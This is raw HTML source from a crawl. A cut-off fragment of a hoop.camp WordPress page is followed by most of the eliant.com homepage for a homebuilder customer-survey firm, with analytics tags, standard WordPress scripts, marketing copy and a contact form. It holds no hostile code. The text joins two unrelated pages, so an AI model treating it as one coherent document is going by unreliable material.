Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://www.hoop.camp/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='https://www.hoop.camp/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.hoop.camp/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.1.1'></script> </body> </html> <!-- Dynamic page generated in 4.149 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2019-05-16 11:20:51 --> <!-- super cache -->
0
<!doctype html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <meta http-equiv="Cache-Control" content="no-cache" /> <meta http-equiv="Pragma" content="no-cache" /> <meta http-equiv="Expires" content="0" /> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous"> <link rel="stylesheet" href="https://eliant.com/wp-content/themes/eliant/css/app.css"> <link rel="stylesheet" href="https://eliant.com/wp-content/themes/eliant/style.css"> <!-- Google Tag Manager --> <script>(function (w, d, s, l, i) { w[l] = w[l] || []; w[l].push({'gtm.start': new Date().getTime(), event: 'gtm.js'}); var f = d.getElementsByTagName(s)[0], j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src = 'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f); })(window, document, 'script', 'dataLayer', 'GTM-NNP4B3K');</script> <!-- End Google Tag Manager --> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-48638609-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag() { dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-48638609-1'); </script> <title>Eliant | International Customer Experience Management &amp; Surveys</title> <!-- This site is optimized with the Yoast SEO plugin v9.5 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Customer experience management for homebuilders, vendors, trades and lenders that leads to more referral sales, better partnerships, overjoyed homebuyers."/> <link rel="canonical" href="https://eliant.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Eliant | International Customer Experience Management &amp; Surveys" /> <meta property="og:description" content="Customer experience management for homebuilders, vendors, trades and lenders that leads to more referral sales, better partnerships, overjoyed homebuyers." /> <meta property="og:url" content="https://eliant.com/" /> <meta property="og:site_name" content="Eliant | International Customer Survey Company" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Customer experience management for homebuilders, vendors, trades and lenders that leads to more referral sales, better partnerships, overjoyed homebuyers." /> <meta name="twitter:title" content="Eliant | International Customer Experience Management &amp; Surveys" /> <meta name="twitter:image" content="https://eliant.com/wp-content/uploads/2019/01/customer-survey-at-home.jpg" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://eliant.com/#website","url":"https://eliant.com/","name":"Eliant | International Customer Survey Company","potentialAction":{"@type":"SearchAction","target":"https://eliant.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://eliant.com/","sameAs":["https://www.facebook.com/Eliantinc","https://www.linkedin.com/company/68026?trk=tyah&trkInfo=tas:eliant,","https://www.youtube.com/channel/UCFRCVl4zMevDMwZfG0ge8Sw"],"@id":"https://eliant.com/#organization","name":"Eliant","logo":"https://eliant.com/wp-content/uploads/2019/01/eliant-footer-logo.png"}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/eliant.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='contact-form-7-css' href='https://eliant.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='responsive-lightbox-magnific-css' href='https://eliant.com/wp-content/plugins/responsive-lightbox/assets/magnific/magnific-popup.min.css?ver=2.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='https://eliant.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.4.5' type='text/css' media='all' /> <script type='text/javascript' src='https://eliant.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://eliant.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://eliant.com/wp-content/plugins/responsive-lightbox/assets/magnific/jquery.magnific-popup.min.js?ver=2.0.5'></script> <script type='text/javascript' src='https://eliant.com/wp-content/plugins/responsive-lightbox/assets/infinitescroll/infinite-scroll.pkgd.min.js?ver=4.9.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var rlArgs = {"script":"magnific","selector":"prettyphoto","customEvents":"","activeGalleries":"1","disableOn":"0","midClick":"1","preloader":"1","closeOnContentClick":"1","closeOnBgClick":"1","closeBtnInside":"1","showCloseBtn":"1","enableEscapeKey":"1","alignTop":"","fixedContentPos":"auto","fixedBgPos":"auto","autoFocusLast":"1","woocommerce_gallery":"0","ajaxurl":"https:\/\/eliant.com\/wp-admin\/admin-ajax.php","nonce":"227672f966"}; /* ]]> */ </script> <script type='text/javascript' src='https://eliant.com/wp-content/plugins/responsive-lightbox/js/front.js?ver=2.0.5'></script> <link rel='https://api.w.org/' href='https://eliant.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://eliant.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://eliant.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.4" /> <link rel='shortlink' href='https://eliant.com/' /> <link rel="alternate" type="application/json+oembed" href="https://eliant.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Feliant.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://eliant.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Feliant.com%2F&#038;format=xml" /> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://eliant.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><style type="text/css" data-type="vc_custom-css">.inner-row{ overflow:hidden; clear:both; } .inner-row-left{ width: 34%; display:inline-block; } .inner-row-right{ width: 62%; margin-left: 2%; display:inline-block; vertical-align: middle; } .inner-row .btn-primary{ min-width: 0; display:block; padding: 9px 5px; } .thirteen-px{ font-size: 13px; line-height: 18px; } .sixteen-px{ font-size: 16px; line-height: 26px; } .armata{ font-family: "Armata", armata, sans-serif; } .hero-text a{ font-size: 13px; border-bottom: 1px solid #010101; letter-spacing: .5px; color: #010101; } .hero-text a:hover{ text-decoration: none; color: #4e4d4d; } @media (min-width: 768px){ .inner-row-left{ width: 25%; } .inner-row-right{ width: 71%; } .page .image-survey-2 { margin-top: 8%; } .page .image-survey-3 { margin-top: 108%; } .white-border-left-md{ border-left: 1px solid #fff; } .padding-left-md-25{ padding-left: 25px; } .d-mobile-only{ display:none; } } @media (min-width: 992px) and (max-width: 1199px){ .vc_row.vc_column-gap-5{ margin-left: 0; margin-right: 0; } } @media (max-width: 767px){ .page .margin-bottom-sm{ margin-bottom: 35px !important; } #home-hero-area{ background-image:none !important; padding: 0 !important; } #home-hero-area .vc_inner{ padding-left: 15px; padding-right: 15px; } }</style><style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1548960792961{padding-top: 120px !important;padding-bottom: 230px !important;background-image: url(https://eliant.com/wp-content/uploads/2019/01/customer-survey-at-home.jpg?id=4059) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1548959071822{padding-top: 20px !important;padding-bottom: 20px !important;background-color: #4ca7b2 !important;}.vc_custom_1548959082358{background-color: #f4f4f4 !important;}.vc_custom_1548960789645{padding-top: 0px !important;}.vc_custom_1548959969099{padding-top: 0px !important;}.vc_custom_1548958617135{padding-top: 8px !important;padding-bottom: 8px !important;}.vc_custom_1548958606992{padding-top: 8px !important;padding-bottom: 8px !important;}.vc_custom_1548962472009{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1552596732225{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1548958078262{padding-top: 60px !important;padding-bottom: 60px !important;}.vc_custom_1548960369342{margin-bottom: 0px !important;}.vc_custom_1548958100206{margin-top: 0px !important;margin-right: 30px !important;margin-bottom: 0px !important;margin-left: 30px !important;padding-top: 0px !important;padding-bottom: 0px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> </head> <body class="home page-template-default page page-id-2 wpb-js-composer js-comp-ver-5.4.5 vc_responsive"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NNP4B3K" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div itemscope itemtype="http://schema.org/LocalBusiness" id="wrapper"> <nav id="navbar" class="navbar-fixed-top"> <div class="container"> <div class="row"> <div class="col-xs-6 col-sm-4 nav-brand"> <a href="https://eliant.com/" class="nav-brand"> <img itemprop="image" src="https://eliant.com/wp-content/themes/eliant/images/eliant-logo-no-tag.svg" alt="Eliant | International Customer Survey Company" class="site-logo"> </a> </div> <div class="col-xs-6 col-sm-8 nav-links"> <div class="menu-brief-header-menu-container"><ul id="menu-brief-header-menu" class="menu"><li id="menu-item-4037" class="outline-link dropdown-link menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4037"><a href="#">Dashboards</a> <ul class="sub-menu"> <li id="menu-item-4038" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4038"><a target="_blank" href="http://ratetrades.eliant.com/Login.aspx">Eliant Trade</a></li> <li id="menu-item-4039" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4039"><a target="_blank" href="https://transport.eliant.com/">Transport</a></li> </ul> </li> <li id="menu-item-4040" class="button-link menu-item menu-item-type-post_type menu-item-object-page menu-item-4040"><a href="https://eliant.com/contact/">Request a Demo</a></li> </ul></div> <a href="#" role="button" class="menu-dropdown-button"> <span class="menu-lines"> <span class="menu-line"></span> <span class="menu-line"></span> <span class="menu-line"></span> </span> <span class="menu-text">Menu</span> </a> </div> </div> </div> </nav> <nav id="menu"> <div class="container-fluid"> <div class="row"> <a href="#" class="menu-close-button">close &times;</a> <div class="col-xs-4"> <a href="https://eliant.com/about" class="menu-link "><span>About Eliant</span></a> </div> <div class="col-xs-4"> <a href="https://eliant.com/testimonials" class="menu-link "><span>Testimonials</span></a> </div> <div class="col-xs-4"> <a href="https://eliant.com/blog" class="menu-link "><span>The Eliant Blog</span></a> </div> </div><div class="row"> <div class="col-xs-4"> <a href="https://eliant.com/surveys" class="menu-link has-children"><span>Surveys</span></a> <ul class="child-links"> <li><a href="https://eliant.com/tradestar/">TradeSTAR</a></li> <li><a href="https://eliant.com/surveys#rateEXPERIENCE">rateEXPERIENCE</a></li> <li><a href="https://eliant.com/surveys#rateHOME">rateHOME</a></li> <li><a href="https://eliant.com/surveys#rateLENDER">rateLENDER</a></li> <li><a href="https://eliant.com/surveys#rateSOCIAL">rateSOCIAL</a></li> <li><a href="https://eliant.com/surveys#rateAPARTMENTS">rateAPARTMENTS</a></li> </ul> </div> <div class="col-xs-4"> <a href="https://eliant.com/services" class="menu-link has-children"><span>Services</span></a> <ul class="child-links"> <li><a href="/on-site-insight">On-Site Insight</a></li> <li><a href="https://eliant.com/services#speaking-engagements">Speaking Engagements</a></li> <li><a href="https://eliant.com/services#training-programs">Training Programs</a></li> <li><a href="https://eliant.com/services#eliant-certification">Eliant Certification</a></li> </ul> </div> <div class="col-xs-4"> <a href="https://eliant.com/faq" class="menu-link "><span>FAQ</span></a> </div> </div><div class="row"> <div class="col-xs-4"> <a href="https://eliant.com/roundtable-2018-v3/" class="menu-link "><span>Eliant Roundtable 2018</span></a> </div> <div class="col-xs-4"> <a href="https://eliant.com/sponsors" class="menu-link "><span>Sponsors</span></a> </div> <div class="col-xs-4"> <a href="https://eliant.com/contact" class="menu-link "><span>Contact Us</span></a> </div> </div> </div> </nav> <div class="page page-home"> <div id="home-hero-area" data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1548960792961 vc_row-has-fill vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1548960789645"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element d-mobile-only" > <div class="wpb_wrapper"> <p><img class="img-responsive" src="https://eliant.com/wp-content/uploads/2019/01/customer-survey-at-home.jpg" alt="man and woman taking a customer survey at home" width="1440" height="620" /></p> </div> </div> <div class="vc_row wpb_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-7 vc_col-lg-4 vc_col-md-5"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element hero-text" > <div class="wpb_wrapper"> <h1 style="font-size: 36px; color: #4e4d4d; line-height: 1.2em; margin: 0 0 20px;">Solutions for<br /> Homebuyer Delight</h1> <h5 style="color: #4e4d4d; font-size: 17px; line-height: 26px; margin: 0 0 35px;">Customer experience management for homebuilders, vendors, trades and lenders that leads to more referral sales, better partnerships, and overjoyed homebuyers.</h5> <p><a href="https://eliant.com/surveys/">Learn more</a>     <a href="https://eliant.com/contact/">Request a demo</a></p> </div> </div> </div></div></div></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1548959071822 vc_row-has-fill vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1548959969099"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid vc_row-o-content-middle vc_row-flex"><div class="wpb_column vc_column_container vc_col-sm-5"><div class="vc_column-inner vc_custom_1548958617135"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element vc_custom_1548962472009" > <div class="wpb_wrapper"> <h3 style="text-align: center; margin: 0; color: #363636; font-size: 20px;"><a style="color: #363636;" href="https://eliant.com/choice-awards/">Homebuyers’ Choice Awards 2019</a></h3> </div> </div> </div></div></div><div class="white-border-left-md wpb_column vc_column_container vc_col-sm-7"><div class="vc_column-inner vc_custom_1548958606992"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element vc_custom_1552596732225 padding-left-md-25" > <div class="wpb_wrapper"> <h4 style="margin: 0; color: #f2f3f3; line-height: 1.3em;">Who claimed this year&#8217;s top customer experience honors?</h4> <p style="margin: 0;"><a style="text-decoration: underline; color: #f2f3f3; font-family: lora, serif;" href="https://eliant.com/choice-awards/" target="_blank" rel="noopener">See complete 2019 winners list</a></p> </div> </div> </div></div></div></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1548958078262"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid vc_row-o-content-middle vc_row-flex"><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element vc_custom_1548960369342 margin-bottom-sm" > <div class="wpb_wrapper"> <p style="text-align: center;"><img class="size-full wp-image-4057" src="https://eliant.com/wp-content/uploads/2019/01/eliant-logo-183.png" alt="Eliant Experience Management logo" width="183" height="75" /></p> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-9"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element vc_custom_1548958100206 text-container" > <div class="wpb_wrapper"> <p><span style="color: #181719;">For more than 35 years, our mission has been to measure and understand the drivers and deliverables behind extraordinary customer experiences in the new home industry. Powered by our best-in-class technology, we equip our clients with the data, insights and action steps they need to grow their businesses by delighting customers at every turn.</span></p> </div> </div> </div></div></div></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid padding_top_0 vc_custom_1548959082358 vc_row-has-fill vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid contains-animations vc_column-gap-5"><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-md-6"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <div class="row low-margin display-on-desktop-only"> <div class="col-xs-6 col-xs-offset-6"> <div class="image-top-left"><img class="img-responsive grid-image image-survey-1" src="https://eliant.com/wp-content/uploads/2019/01/home-image-1.jpg" alt="Couple taking a Customer Experience Survey, partial image with shoulder" /></div> </div> </div> <div class="row low-margin display-on-mobile-only"> <div class="col-xs-12"> <div class="image-top-left"> <p><img class="section-image" src="https://eliant.com/wp-content/uploads/2019/01/home-image-mobile.jpg" alt="Couple taking a mobile customer experience survey at home" width="874" height="698" /></p> </div> </div> </div> </div> </div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <div class="text-left" style="padding-top: 3rem!important;"> <h2 style="font-size: 36px; color: #4e4d4d; line-height: 1.2em;">Experience<br /> Management by Eliant</h2> <p class="sixteen-px" style="color: #000;">You can’t improve what you don’t measure. But measurement alone won’t deliver happier homebuyers, better partnerships or more referral sales. What matters is what you measure and how you act on the insights. Explore how Eliant can make customer experience management finally work for you.</p> <div class="inner-row thirteen-px" style="margin-top: 40px; margin-bottom: 12px;"> <div class="inner-row-left"><a class="btn btn-primary" href="https://eliant.com/surveys/">Eliant Home</a></div> <div class="inner-row-right armata">Measure +improve new homebuyers’ satisfaction</div> </div> <div class="inner-row thirteen-px" style="margin-bottom: 12px;"> <div class="inner-row-left"><a class="btn btn-primary" href="https://eliant.com/tradestar/">Eliant Trade</a></div> <div class="inner-row-right armata">Make the builder-trade relationship more profitable</div> </div> <div class="inner-row thirteen-px"> <div class="inner-row-left"><a class="btn btn-primary" href="https://eliant.com/surveys#rateLENDER">Eliant Certified</a></div> <div class="inner-row-right armata">Measure +improve mortgage customer experiences</div> </div> </div> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3 vc_hidden-sm vc_hidden-xs"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p><img class="img-responsive grid-image image-survey-2" src="https://eliant.com/wp-content/uploads/2019/01/home-image-2.jpg" alt="Mobile device customer survey being taken at home" /></p> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3 vc_hidden-sm vc_hidden-xs"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p><img class="img-responsive grid-image image-survey-3" src="https://eliant.com/wp-content/uploads/2019/01/home-image-3.jpg" alt="Candle on countertop" /></p> </div> </div> </div></div></div></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div> <div class="modal fade" tabindex="-1" role="dialog" id="sponsor-modal"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="bg-gradient"> <div role="form" class="wpcf7" id="wpcf7-f3348-o1" lang="en-US" dir="ltr"> <div class="screen-reader-response"></div> <form action="/#wpcf7-f3348-o1" method="post" class="wpcf7-form" novalidate="novalidate"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="3348" /> <input type="hidden" name="_wpcf7_version" value="5.1.1" /> <input type="hidden" name="_wpcf7_locale" value="en_US" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f3348-o1" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> <input type="hidden" name="g-recaptcha-response" value="" /> </div> <div class="modal-header"><button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button><br /> <h4 class="modal-title">Become a Sponsor</h4> </div> <div class="modal-body"> <div class="form-group"> <label for="full_name" class="hidden" aria-hidden="true">*Name</label><span class="wpcf7-form-control-wrap full_name"><input type="text" name="full_name" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false" placeholder="*Name" /></span> </div> <div class="form-group"> <label for="email" class="hidden" aria-hidden="true">*Email</label><span class="wpcf7-form-control-wrap email"><input type="email" name="email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email form-control" aria-required="true" aria-invalid="false" placeholder="*Email" /></span> </div> <div class="form-group"> <label for="phone_number" class="hidden" aria-hidden="true">*Phone Number</label><span class="wpcf7-form-control-wrap phone_number"><input type="text" name="phone_number" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false" placeholder="*Phone Number" /></span> </div> <div class="form-group"> <label for="type" class="hidden" aria-hidden="true">*Type</label><span class="wpcf7-form-control-wrap type"><select name="type" class="wpcf7-form-control wpcf7-select wpcf7-validates-as-required form-control" id="type" aria-required="true" aria-invalid="false"><option value="Gift">Gift</option><option value="Silver">Silver</option><option value="Gold">Gold</option><option value="Platinum">Platinum</option><option value="Leader">Leader</option><option value="Premier">Premier</option></select></span> </div> <div class="form-group"> <label for="message" class="hidden" aria-hidden="true">Message</label><span class="wpcf7-form-control-wrap message"><textarea name="message" cols="40" rows="10" class="wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false" placeholder="Message"></textarea></span> </div> </div> <div class="modal-footer"> <input type="submit" value="Submit" class="wpcf7-form-control wpcf7-submit" /> </div> <div class="wpcf7-response-output wpcf7-display-none"></div></form></div> </div> </div> </div> </div> </div><footer id="footer"> <div class="container"> <div class="row"> <div class="col-sm-3 footer-1"> <div id="text-2" class="widget widget_text"> <div class="textwidget"><p><img class="alignnone size-full wp-image-3996" src="https://eliant.com/wp-content/uploads/2019/01/eliant-footer-logo.png" alt="Eliant Experience Management Logo" width="176" height="72" /></p> </div> </div> </div> <div class="col-sm-6 footer-2"> <div id="custom_html-2" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><p style="text-align: justify;">Established in 1984 as the original homebuyer survey company, Eliant has evolved into a full-service experience management (XM) partner to the homebuilding industry. Powered by superior assessments and best-in-class technology, Eliant offers homebuilders, vendors, trades, lenders and consumers reliable answers to their most critical homebuilding and home buying questions. Eliant is the parent of the annual Homebuyers’ Choice Awards, arbiter of homebuyer satisfaction in the homebuilding industry. Headquartered in Aliso Viejo, CA, Eliant serves the nation’s top 150+ builders, conducting more than 125,000 assessments a year.</p> <div class="row bottom-row"> <div class="col-md-7"> <div itemprop="address" itemscope itemtype="http://schema.org/PostalAddress"> <p> © Eliant, Inc., 2019<br> <span itemprop="streetAddress">27141 Aliso Creek, #290</span> | <span itemprop="addressLocality">Aliso Viejo</span>, <span itemprop="addressRegion">CA</span> <span itemprop="postalCode">92656</span><br> <span itemprop="telephone">(866) 755-8199</span> | <a itemprop="email" href="mailto:[email protected]" target="_blank">[email protected]</a> </p> <meta itemprop="addressCountry" content="US"> <meta itemprop="name" content="Eliant"> <span itemprop="openingHoursSpecification" itemscope itemtype="http://schema.org/OpeningHoursSpecification"> <span itemprop="dayOfWeek" itemscope itemtype="http://schema.org/DayOfWeek"> <meta itemprop="name" content="Mo-Su 24:00"> </span> </span> </div> </div> <div class="col-md-5"> <p class="footer-links"> <a href="https://www.linkedin.com/company/68026?trk=tyah&trkInfo=tas%3Aeliant%2C%20" target="_blank"> <i class="fa fa-linkedin"></i> </a> <a href="https://www.facebook.com/Eliantinc" target="_blank"> <i class="fa fa-facebook"></i> </a> <a href="https://www.youtube.com/channel/UCFRCVl4zMevDMwZfG0ge8Sw" target="_blank"> <i class="fa fa-youtube-play"></i> </a> </p> </div> </div></div></div> </div> <div class="col-sm-3 footer-3"> <div id="nav_menu-2" class="widget widget_nav_menu"><div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="menu"><li id="menu-item-3997" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-2 current_page_item menu-item-3997"><a href="https://eliant.com/">Home</a></li> <li id="menu-item-3998" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3998"><a href="https://eliant.com/about/">About</a></li> <li id="menu-item-4002" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4002"><a href="https://eliant.com/services/">Solutions</a></li> <li id="menu-item-4001" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4001"><a href="https://eliant.com/faq/">FAQs</a></li> <li id="menu-item-4000" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4000"><a href="https://eliant.com/choice-awards/">Homebuyers&#8217; Choice</a></li> <li id="menu-item-3999" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3999"><a href="https://eliant.com/blog/">The Eliant Blog</a></li> </ul></div></div><div id="text-3" class="widget widget_text"> <div class="textwidget"><p><a href="https://eliant.com/contact" class="btn btn-primary">Request a Demo</a></p> </div> </div> </div> </div> </div> </footer> </div> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/eliant.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://eliant.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' 